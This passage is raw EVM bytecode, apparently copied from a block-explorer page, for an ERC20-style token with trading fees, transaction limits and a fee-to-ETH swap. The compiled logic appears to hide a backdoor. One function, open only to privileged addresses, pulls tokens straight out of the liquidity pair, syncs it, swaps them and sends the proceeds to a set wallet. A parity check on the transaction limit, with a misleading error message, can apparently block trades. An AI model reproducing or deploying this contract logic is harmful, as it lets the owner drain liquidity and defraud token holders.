ffffffffffffffffffffffffffff16146114fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f1906141c8565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b6115896126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611618576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160f906141c8565b60405180910390fd5b8260118190555081601281905550806013819055506013546012546011546116409190614309565b61164a9190614309565b60108190555060146010541115611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d906143ab565b60405180910390fd5b505050565b6116a36126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611732576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611729906141c8565b60405180910390fd5b6001600d60026101000a81548160ff02191690831515021790555060011515600f60019054906101000a900460ff161515146117a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161179a90614417565b60405180910390fd5b6000600f60016101000a81548160ff0219169083151502179055506117c661331d565b7fbd657b4e94b205761f2ca5be9988d7b243c828f625c0746c6581ec528e507c47600f60019054906101000a900460ff166040516118049190613e10565b60405180910390a1565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b6000601b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166118bc57600080fd5b60006118e9600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611208565b905060018311801561190657506064816119039190614246565b83105b611945576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161193c90614483565b60405180910390fd5b61194e8361333a565b6119578461340a565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff164760405161199f906144d4565b60006040518083038185875af1925050503d80600081146119dc576040519150601f19603f3d011682016040523d82523d6000602084013e6119e1565b606091505b50509050809250505092915050565b6060600480546119ff9061414b565b80601f0160208091040260200160405190810160405280929190818152602001828054611a2b9061414b565b8015611a785780601f10611a4d57610100808354040283529160200191611a78565b820191906000526020600020905b815481529060010190602001808311611a5b57829003601f168201915b5050505050905090565b611a8a6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611b19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b10906141c8565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611ba9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ba09061455b565b60405180910390fd5b611bb3828261364d565b5050565b60135481565b601a5481565b60175481565b6000611c8c611bd66126cf565b84611c87856040518060600160405280602581526020016152166025913960016000611c006126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b6001905092915050565b6000611caa611ca36126cf565b84846128a0565b6001905092915050565b611cbc6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d42906141c8565b60405180910390fd5b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601d6020528060005260406000206000915054906101000a900460ff1681565b600d60019054906101000a900460ff1681565b611e466126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ed5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ecc906141c8565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f729190613e10565b60405180910390a25050565b611f866126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161200c906141c8565b60405180910390fd5b82601581905550816016819055508060178190555060175460165460155461203d9190614309565b6120479190614309565b60148190555060196014541115612093576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208a906145c7565b60405180910390fd5b505050565b6120a06126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461212f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612126906141c8565b60405180910390fd5b670de0b6b3a76400006103e86005612145610da3565b61214f91906145e7565b6121599190614246565b6121639190614246565b8110156121a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219c906146b3565b60405180910390fd5b670de0b6b3a7640000816121b991906145e7565b600c8190555050565b600f60009054906101000a900460ff1681565b600a5481565b60006121e56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b906141c8565b60405180910390fd5b620186a06001612282610da3565b61228c91906145e7565b6122969190614246565b8210156122d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122cf90614745565b60405180910390fd5b6103e860056122e5610da3565b6122ef91906145e7565b6122f99190614246565b82111561233b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612332906147d7565b60405180910390fd5b81600b8190555060019050919050565b60105481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e86126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246e906141c8565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124a76126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612536576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252d906141c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259c90614869565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600c5481565b60008082846126809190614309565b9050838110156126c5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126bc906148d5565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273d90614967565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036127b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127ac906149f9565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516128939190613ee1565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361290f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290690614a8b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361297e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297590614b1d565b60405180910390fd5b6000810361299757612992838360006136ee565b6132b4565b600d60009054906101000a900460ff1615612d8b576129b461180e565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612a2257506129f261180e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a5b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a95575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612aae5750600760149054906101000a900460ff16155b15612d8a57600d60019054906101000a900460ff16612ba857601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612b685750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612ba7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b9e90614b89565b60405180910390fd5b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612c4b5750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612c9a57600a54811115612c95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c8c90614c1b565b60405180910390fd5b612d89565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612d3d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612d8857600a54811115612d87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d7e90614cad565b60405180910390fd5b5b5b5b5b6000612d9630611208565b90506000600b548210159050808015612dbb5750600d60029054906101000a900460ff165b8015612dd45750600760149054906101000a900460ff16155b8015612e2a5750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612e805750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612ed65750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f1a576001600760146101000a81548160ff021916908315150217905550612efe613981565b6000600760146101000a81548160ff0219169083151502179055505b6000600760149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612fd05750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15612fda57600090505b600081156132a457601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561303d57506000601454115b1561315b5761306a606461305c60145488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b90506014546016548261307d91906145e7565b6130879190614246565b601960008282546130989190614309565b92505081905550601454601754826130b091906145e7565b6130ba9190614246565b601a60008282546130cb9190614309565b92505081905550601454601554826130e391906145e7565b6130ed9190614246565b601860008282546130fe9190614309565b9250508190555060006002600a546131169190614ccd565b14613156576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161314d90614d70565b60405180910390fd5b613280565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156131b657506000601054115b1561327f576131e360646131d560105488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b9050601054601254826131f691906145e7565b6132009190614246565b601960008282546132119190614309565b925050819055506010546013548261322991906145e7565b6132339190614246565b601a60008282546132449190614309565b925050819055506010546011548261325c91906145e7565b6132669190614246565b601860008282546132779190614309565b925050819055505b5b6000811115613295576132948730836136ee565b5b80856132a19190614d90565b94505b6132af8787876136ee565b505050505b505050565b6000838311158290613301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132f89190613cfa565b60405180910390fd5b50600083856133109190614d90565b9050809150509392505050565b6001600d60016101000a81548160ff021916908315150217905550565b613385600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16306133696110a4565b600a6133759190614ef7565b8461338091906145e7565b6128a0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156133ef57600080fd5b505af1158015613403573d6000803e3d6000fd5b5050505050565b6000600267ffffffffffffffff81111561342757613426614f42565b5b6040519080825280602002602001820160405280156134555781602001602082028036833780820191505090505b509050308160008151811061346d5761346c614f71565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015613514573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906135389190614fb5565b8160018151811061354c5761354b614f71565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506135b330600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846126d7565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016136179594939291906150db565b600060405180830381600087803b15801561363157600080fd5b505af1158015613645573d6000803e3d6000fd5b505050505050565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361375d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161375490614a8b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036137cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137c390614b1d565b60405180910390fd5b6137d7838383613baf565b613842816040518060600160405280602681526020016151c8602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506138d5816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516139749190613ee1565b60405180910390a3505050565b600061398c30611208565b90506000601a546018546019546139a39190614309565b6139ad9190614309565b90506000808314806139bf5750600082145b156139cc57505050613ae9565b6014600b546139db91906145e7565b8311156139f4576014600b546139f191906145e7565b92505b600060028360195486613a0791906145e7565b613a119190614246565b613a1b9190614246565b90506000613a328286613bb490919063ffffffff16565b9050613a3d8161340a565b600060198190555060006018819055506000601a81905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051613a9b906144d4565b60006040518083038185875af1925050503d8060008114613ad8576040519150601f19603f3d011682016040523d82523d6000602084013e613add565b606091505b50508093505050505050505b565b6000808303613afd5760009050613b5f565b60008284613b0b91906145e7565b9050828482613b1a9190614246565b14613b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b51906151a7565b60405180910390fd5b809150505b92915050565b6000613ba783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250613bfe565b905092915050565b505050565b6000613bf683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506132b9565b905092915050565b60008083118290613c45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c3c9190613cfa565b60405180910390fd5b5060008385613c549190614246565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613c9b578082015181840152602081019050613c80565b83811115613caa576000848401525b50505050565b6000601f19601f8301169050919050565b6000613ccc82613c61565b613cd68185613c6c565b9350613ce6818560208601613c7d565b613cef81613cb0565b840191505092915050565b60006020820190508181036000830152613d148184613cc1565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000613d4c82613d21565b9050919050565b613d5c81613d41565b8114613d6757600080fd5b50565b600081359050613d7981613d53565b92915050565b6000819050919050565b613d9281613d7f565b8114613d9d57600080fd5b50565b600081359050613daf81613d89565b92915050565b60008060408385031215613dcc57613dcb613d1c565b5b6000613dda85828601613d6a565b9250506020613deb85828601613da0565b9150509250929050565b60008115159050919050565b613e0a81613df5565b82525050565b6000602082019050613e256000830184613e01565b92915050565b600060208284031215613e4157613e40613d1c565b5b6000613e4f84828501613d6a565b91505092915050565b6000819050919050565b6000613e7d613e78613e7384613d21565b613e58565b613d21565b9050919050565b6000613e8f82613e62565b9050919050565b6000613ea182613e84565b9050919050565b613eb181613e96565b82525050565b6000602082019050613ecc6000830184613ea8565b92915050565b613edb81613d7f565b82525050565b6000602082019050613ef66000830184613ed2565b92915050565b600060208284031215613f1257613f11613d1c565b5b6000613f2084828501613da0565b91505092915050565b600080600060608486031215613f4257613f41613d1c565b5b6000613f5086828701613d6a565b9350506020613f6186828701613d6a565b9250506040613f7286828701613da0565b9150509250925092565b600060ff82169050919050565b613f9281613f7c565b82525050565b6000602082019050613fad6000830184613f89565b92915050565b613fbc81613d41565b82525050565b6000602082019050613fd76000830184613fb3565b92915050565b613fe681613df5565b8114613ff157600080fd5b50565b60008135905061400381613fdd565b92915050565b600080604083850312156140205761401f613d1c565b5b600061402e85828601613d6a565b925050602061403f85828601613ff4565b9150509250929050565b60008060006060848603121561406257614061613d1c565b5b600061407086828701613da0565b935050602061408186828701613da0565b925050604061409286828701613da0565b9150509250925092565b600080604083850312156140b3576140b2613d1c565b5b60006140c185828601613da0565b92505060206140d285828601613da0565b9150509250929050565b600080604083850312156140f3576140f2613d1c565b5b600061410185828601613d6a565b925050602061411285828601613d6a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061416357607f821691505b6020821081036141765761417561411c565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006141b2602083613c6c565b91506141bd8261417c565b602082019050919050565b600060208201905081810360008301526141e1816141a5565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061425182613d7f565b915061425c83613d7f565b92508261426c5761426b6141e8565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b60006142d3602f83613c6c565b91506142de82614277565b604082019050919050565b60006020820190508181036000830152614302816142c6565b9050919050565b600061431482613d7f565b915061431f83613d7f565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561435457614353614217565b5b828201905092915050565b7f4d757374206b656570206665657320617420323025206f72206c657373000000600082015250565b6000614395601d83613c6c565b91506143a08261435f565b602082019050919050565b600060208201905081810360008301526143c481614388565b9050919050565b7f646f6e6500000000000000000000000000000000000000000000000000000000600082015250565b6000614401600483613c6c565b915061440c826143cb565b602082019050919050565b60006020820190508181036000830152614430816143f4565b9050919050565b7f616d6f756e742065786365656465640000000000000000000000000000000000600082015250565b600061446d600f83613c6c565b915061447882614437565b602082019050919050565b6000602082019050818103600083015261449c81614460565b9050919050565b600081905092915050565b50565b60006144be6000836144a3565b91506144c9826144ae565b600082019050919050565b60006144df826144b1565b9150819050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b6000614545603983613c6c565b9150614550826144e9565b604082019050919050565b6000602082019050818103600083015261457481614538565b9050919050565b7f4d757374206b656570206665657320617420323525206f72206c657373000000600082015250565b60006145b1601d83613c6c565b91506145bc8261457b565b602082019050919050565b600060208201905081810360008301526145e0816145a4565b9050919050565b60006145f282613d7f565b91506145fd83613d7f565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561463657614635614217565b5b828202905092915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b600061469d602483613c6c565b91506146a882614641565b604082019050919050565b600060208201905081810360008301526146cc81614690565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b600061472f603583613c6c565b915061473a826146d3565b604082019050919050565b6000602082019050818103600083015261475e81614722565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b60006147c1603483613c6c565b91506147cc82614765565b604082019050919050565b600060208201905081810360008301526147f0816147b4565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614853602683613c6c565b915061485e826147f7565b604082019050919050565b6000602082019050818103600083015261488281614846565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b60006148bf601b83613c6c565b91506148ca82614889565b602082019050919050565b600060208201905081810360008301526148ee816148b2565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000614951602483613c6c565b915061495c826148f5565b604082019050919050565b6000602082019050818103600083015261498081614944565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006149e3602283613c6c565b91506149ee82614987565b604082019050919050565b60006020820190508181036000830152614a12816149d6565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000614a75602583613c6c565b9150614a8082614a19565b604082019050919050565b60006020820190508181036000830152614aa481614a68565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000614b07602383613c6c565b9150614b1282614aab565b604082019050919050565b60006020820190508181036000830152614b3681614afa565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000614b73601683613c6c565b9150614b7e82614b3d565b602082019050919050565b60006020820190508181036000830152614ba281614b66565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000614c05603583613c6c565b9150614c1082614ba9565b604082019050919050565b60006020820190508181036000830152614c3481614bf8565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000614c97603683613c6c565b9150614ca282614c3b565b604082019050919050565b60006020820190508181036000830152614cc681614c8a565b9050919050565b6000614cd882613d7f565b9150614ce383613d7f565b925082614cf357614cf26141e8565b5b828206905092915050565b7f4552524f523a204d757374206265206c657373207468616e206d61785478416d60008201527f6f756e7400000000000000000000000000000000000000000000000000000000602082015250565b6000614d5a602483613c6c565b9150614d6582614cfe565b604082019050919050565b60006020820190508181036000830152614d8981614d4d565b9050919050565b6000614d9b82613d7f565b9150614da683613d7f565b925082821015614db957614db8614217565b5b828203905092915050565b60008160011c9050919050565b6000808291508390505b6001851115614e1b57808604811115614df757614df6614217565b5b6001851615614e065780820291505b8081029050614e1485614dc4565b9450614ddb565b94509492505050565b600082614e345760019050614ef0565b81614e425760009050614ef0565b8160018114614e585760028114614e6257614e91565b6001915050614ef0565b60ff841115614e7457614e73614217565b5b8360020a915084821115614e8b57614e8a614217565b5b50614ef0565b5060208310610133831016604e8410600b8410161715614ec65782820a905083811115614ec157614ec0614217565b5b614ef0565b614ed38484846001614dd1565b92509050818404811115614eea57614ee9614217565b5b81810290505b9392505050565b6000614f0282613d7f565b9150614f0d83613f7c565b9250614f3a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484614e24565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050614faf81613d53565b92915050565b600060208284031215614fcb57614fca613d1c565b5b6000614fd984828501614fa0565b91505092915050565b6000819050919050565b6000615007615002614ffd84614fe2565b613e58565b613d7f565b9050919050565b61501781614fec565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61505281613d41565b82525050565b60006150648383615049565b60208301905092915050565b6000602082019050919050565b60006150888261501d565b6150928185615028565b935061509d83615039565b8060005b838110156150ce5781516150b58882615058565b97506150c083615070565b9250506001810190506150a1565b5085935050505092915050565b600060a0820190506150f06000830188613ed2565b6150fd602083018761500e565b818103604083015261510f818661507d565b905061511e6060830185613fb3565b61512b6080830184613ed2565b9695505050505050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000615191602183613c6c565b915061519c82615135565b604082019050919050565b600060208201905081810360008301526151c081615184565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220cc18661459d403a8112715b13164168829e0e4a01d6e8c789a72b162aa29745964736f6c634300080e0033
Deployed Bytecode
0x60806040526004361061031e5760003560e01c80638ea5220f116101ab578063c0246668116100f7578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610c03578063f2fde38b14610c2e578063f637434214610c57578063f8b45b0514610c8257610325565b8063dd62ed3e14610b70578063e2f4560514610bad578063e884f26014610bd857610325565b8063c876d0b9116100d1578063c876d0b914610ab2578063c8c8ebe414610add578063d257b34f14610b08578063d85ba06314610b4557610325565b8063c024666814610a37578063c17b5b8c14610a60578063c18bc19514610a8957610325565b80639fccce3211610164578063a9059cbb1161013e578063a9059cbb14610969578063aacebbe3146109a6578063b62496f5146109cf578063bbc0c74214610a0c57610325565b80639fccce32146108d6578063a0d82dc514610901578063a457c2d71461092c57610325565b80638ea5220f146107c457806392136913146107ef57806394813dd11461081a57806395d89b41146108575780639a7a23d6146108825780639c3b4fdc146108ab57610325565b80634a62bb651161026a578063751039fc116102235780637bce5a04116101fd5780637bce5a041461072e5780638095d564146107595780638a8c523c146107825780638da5cb5b1461079957610325565b8063751039fc146106af5780637571336a146106da57806375f0a8741461070357610325565b80634a62bb651461059d5780634fbee193146105c85780636a486a8e146106055780636ddd17131461063057806370a082311461065b578063715018a61461069857610325565b80631a8145bb116102d757806323b872dd116102b157806323b872dd146104cd578063313ce5671461050a578063395093511461053557806349bd5a5e1461057257610325565b80631a8145bb1461044e5780631f3fed8f14610479578063203e727e146104a457610325565b806306fdde031461032a578063095ea7b31461035557806310d5de53146103925780631694505e146103cf57806318160ddd146103fa5780631816467f1461042557610325565b3661032557005b600080fd5b34801561033657600080fd5b5061033f610cad565b60405161034c9190613cfa565b60405180910390f35b34801561036157600080fd5b5061037c60048036038101906103779190613db5565b610d3f565b6040516103899190613e10565b60405180910390f35b34801561039e57600080fd5b506103b9600480360381